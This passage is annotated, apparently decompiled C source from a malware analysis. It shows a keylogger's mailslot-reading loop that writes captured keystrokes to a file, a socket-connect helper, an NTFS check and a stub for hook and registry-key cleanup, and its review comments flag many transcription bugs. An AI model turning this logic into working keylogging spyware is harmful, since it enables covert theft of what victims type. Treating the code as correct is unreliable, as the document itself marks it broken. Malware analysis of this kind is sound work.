				{                                        //6
					// PROCESS_SET_SESSIONID == 0x4 == DACL_SECURITY_INFORMATION; pDacl NULL -> NULL DACL (see header note)
					if(ERROR_SUCCESSW==l_SetSecurityInfo(hMailslot,SE_KERNEL_OBJECT,PROCESS_SET_SESSIONID,NULL,NULL,NULL,NULL))
					{
						nNumberOfBytesToWrite=0;
						dword_6a010=1;	// tell the hook procedures the channel is open
						do
						{
							nNumberOfBytesToWrite=0x50;
							if(0!=read_mailslot(hMailslot,buffer,&nNumberOfBytesToWrite))
							{
								if(nNumberOfBytesToWrite>0)
								{
									if(true==WriteFile(hObject,buffer,nNumberOfBytesToWrite,NULL,NULL))	// NOTE(review): NULL byte count with NULL overlapped is invalid
									{
										bytes_num+=nNumberOfBytesToWrite;
										if(nNumberOfBytesToWrite>=*(DWORD *)((char *)lParam+0x2bc))	// NOTE(review): probably meant bytes_num
										{
											dword_6a010=0;	// limit reached: stop collecting
										}
									}
								}
							}
							else
							{
								dword_6a010=0;	// read failed: stop collecting
							}
							Sleep(0xfa);	// 250 ms
						}while(dword_6a010);
						CloseHandle(hObject);
						CloseHandle(hMailslot);
						clean_hook_and_key(lParam);
						return 0;
					}
				}
			}
		}
	}
	else
	{
		Clean_hook_and_key(lParam);
		_endthreadex(1);
		return 0;
	}
}

/*
 * Returns true when the volume at lpRootPathName reports file system "NTFS" with persistent ACLs, false
 * otherwise (including when GetVolumeInformation fails).
 * NOTE(review): the parameter should be a string (char * / LPCSTR) -- a single char is passed as
 * transcribed; the last two GetVolumeInformation arguments are in the wrong order (the API takes the
 * buffer before its size); `FileSystemFlags==FILE_PERSISTENT_ACLS` tests equality with one flag where a
 * bitwise test (& FILE_PERSISTENT_ACLS) is presumably meant, since NTFS reports several flags at once.
 */
bool check_root_drive_info(char lpRootPathName)
{
	DWORD   FileSystemFlags;
	DWORD   MaximumComponentLength;
	char    FileSystemNameBuffer[MAX_PATH];

	if(GetVolumeInformation(lpRootPathName,NULL,0,NULL,&MaximumComponentLength,&FileSystemFlags,MAX_PATH,FileSystemNameBuffer))	// NOTE(review): last two args swapped
	{
		if(0==lstrcmpA(FileSystemNameBuffer,"NTFS")&&FileSystemFlags==FILE_PERSISTENT_ACLS)	// NOTE(review): should be a bit test
		{
			/*
			FILE_PERSISTENT_ACLS,The specified volume preserves and enforces 
			access control lists(ACL).For example,the NTFS file system preserves 
			and enforces ACLs,and the FAT file system does not.
			*/
			return true;
		}
	}
	return false;
}

/*
 * Waits up to optlen milliseconds for the file-scope socket `sock` (not declared in this listing) to become
 * writable -- the usual way to wait for a non-blocking connect() to complete -- and returns 1 when it is
 * writable and not in the exception set; when select() does not report exactly one ready descriptor it
 * returns the pending socket error from getsockopt(SO_ERROR) ORed with 0xff.
 * NOTE(review), transcription problems to confirm against the sample:
 *  - the function shadows WinSock's select() and then calls it with five arguments;
 *  - `1=select(...)` is an assignment to a literal, `1==` was meant;
 *  - fd_array is an array: fd_array[0]=sock;
 *  - the timeout conversion is inconsistent (optlen>1000 -> tv_sec=optlen/1000, otherwise tv_sec=1000*optlen);
 *    presumably tv_usec=1000*optlen (ms -> us) for the small case;
 *  - optval should be an int receiving the error, not a char *, and `|0xff` looks wrong;
 *  - no return when select() returns 1 but sock is in exceptfds (falls off the end, UB).
 */
int select(DWORD optlen)
{
	fd_set   writefds;
	fd_set   exceptfds;
	char*    optval=NULL;
	timeval  timeout;

	writefds.fd_count=1;
	writefds.fd_array=sock;	// NOTE(review): fd_array[0]
	exceptfds.fd_count=1;
	exceptfds.fd_array=sock;

	if(optlen>0x3e8)	// 0x3e8 = 1000 ms
	{
		timeout.tv_usec=0;
		timeout.tv_sec=optlen/0x3e8;
	}
	else
	{
		timeout.tv_usec=0;
		timeout.tv_sec=0x3e8*optlen;	// NOTE(review): presumably tv_usec
	}
	if(1=select(0,NULL,&writefds,&exceptfds,&timeout))	// NOTE(review): `==`, and this is WinSock's select
	{
		if(0==_WSAFDIsSet(sock,&exceptfds))
		{
			return _WSAFDIsSet(sock,&writefds)>0?1:0;
		}
	}
	else
	{
		optlen=4;	// sizeof the SO_ERROR int
		return getsockopt(sock,SOL_SOCKET,SO_ERROR,(char*)&optval,&optlen)|0xff;
	}
}

/*
 * Stub -- body not recovered. Called by do_read_mailslot on every exit path with the configuration block.
 * By its name it removes the keyboard hook (unset_hook) and cleans up the Fdisk service key written by
 * GetRegkeyReady; that is inferred from the name only -- confirm against the sample. do_read_mailslot
 * calls it both as clean_hook_and_key and as Clean_hook_and_key.
 */
void clean_hook_and_key(void* lparam)
{
	/*
	*/
}
